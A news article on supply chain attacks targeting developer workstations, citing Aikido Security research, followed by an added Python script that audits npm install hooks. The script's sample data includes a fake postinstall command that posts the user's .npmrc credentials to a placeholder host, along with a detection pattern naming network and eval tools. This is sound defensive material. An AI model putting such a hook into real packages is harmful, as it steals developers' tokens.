Some developers seeing 7-fold increase in supply chain compromises


As supply chain attacks rage, one engineering team reported a 7-fold spike in vulnerable dependencies over 3 months. Developer computers have become the prime targets for attackers: they offer many open doors, and malicious code bypasses Endpoint Detection and Response (EDR) tools, giving hackers the highest return for their effort.

Aikido Security researchers have warned developers that their systems are now the highest-ROI targets, and supply chain attacks reflect that.


Gavin Williams, Engineering Manager at AI procurement platform provider Omnea, reported facing a 7-fold increase in supply chain vulnerabilities over just 3 months.

“It’s so easy for developers to install a vulnerable package or something that’s been compromised,” Williams said.

From compromised Trivy, TanStack, or LiteLLM and hundreds of other npm packages, to malicious VS Code extensions, all of these supply chain attacks open the door to developer workstations.

“They all share one key factor. They’re targeting the developer device. And it's working,” the Aikido researchers warn in a report.

The main reason is that developer computers often remain largely unmonitored because traditional detection and management tools interfere with their workflow. EDR tools are also nearly blind to what’s going on inside developer tools – they don’t flag NPM packages, IDE extensions, Chrome plugins, or Cursor skills.

One slip, and a single malicious package can run a post-install script to exfiltrate all credentials before the developer realizes.

“A lot of people are living in the terminal now, and they’re installing lots of markdown files and other things. However, naturally, without any verified processes, there’s nothing stopping them from downloading things that they’ve seen on Reddit or X. These could be part of a malware campaign to get people to download it. And then – the rest is history,” the report quotes Walid Mahmoud, DevSecOps lead in the UK public sector.

Artificial intelligence tools have dramatically lowered the barrier to creating and spreading malware.


Aikido promotes its products to address the blind spot of traditional EDR tools and suggests that package-level scanning tools can serve as a first line of defense.
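The post-install hooks described earlier are the mechanism a malicious package uses to run code the moment it lands on a developer machine, and package-level scanning of exactly those hooks is the first line of defense the article points to. As an added example (not from the Aikido report, Cybernews, or any product), the script below walks a node_modules tree, lists every install-time lifecycle script, and marks the ones that shell out to the network or evaluate code; the sample tree and the heuristic patterns are constructed for illustration.

```python
# Added example: audit install-time lifecycle hooks in a node_modules tree.
# These hooks (preinstall/install/postinstall/prepare) run automatically on
# "npm install", which is why a compromised package puts its payload there.
import json
import os
import re
import tempfile

LIFECYCLE = ("preinstall", "install", "postinstall", "prepare")
# Heuristic indicators only, not proof: network fetchers, inline eval, encoded payloads.
SUSPICIOUS = re.compile(r"\b(curl|wget|node\s+-e|eval|base64|powershell)\b", re.I)


def audit_node_modules(root):
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        if "package.json" not in files:
            continue
        with open(os.path.join(dirpath, "package.json"), encoding="utf-8") as fh:
            try:
                meta = json.load(fh)
            except ValueError:
                continue  # unreadable manifest: skip it rather than abort the audit
        scripts = meta.get("scripts") or {}
        name = meta.get("name", os.path.relpath(dirpath, root))
        for hook in LIFECYCLE:
            cmd = scripts.get(hook)
            if cmd:  # only install-time hooks are reported; "test", "build" etc. are not
                findings.append({"package": name, "hook": hook, "command": cmd,
                                 "suspicious": bool(SUSPICIOUS.search(cmd))})
    return findings


def build_sample_tree():
    """Constructed sample: a benign native build, a hook-free package, a credential grabber."""
    root = tempfile.mkdtemp()
    pkgs = {
        "good-native": {"name": "good-native", "scripts": {"install": "node-gyp rebuild"}},
        "no-hooks": {"name": "no-hooks", "scripts": {"test": "jest"}},
        "evil-pkg": {"name": "evil-pkg", "scripts": {
            "postinstall": "curl -s https://example.invalid/c -d @$HOME/.npmrc"}},
    }
    for name, meta in pkgs.items():
        pkg_dir = os.path.join(root, "node_modules", name)
        os.makedirs(pkg_dir)
        with open(os.path.join(pkg_dir, "package.json"), "w", encoding="utf-8") as fh:
            json.dump(meta, fh)
    return root


if __name__ == "__main__":
    for f in audit_node_modules(build_sample_tree()):
        print("SUSPICIOUS" if f["suspicious"] else "review    ", f["package"], f["hook"], f["command"])
```

Running it against a real project's node_modules after `npm install --ignore-scripts` lets a developer read every hook before deciding whether to allow it to execute.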
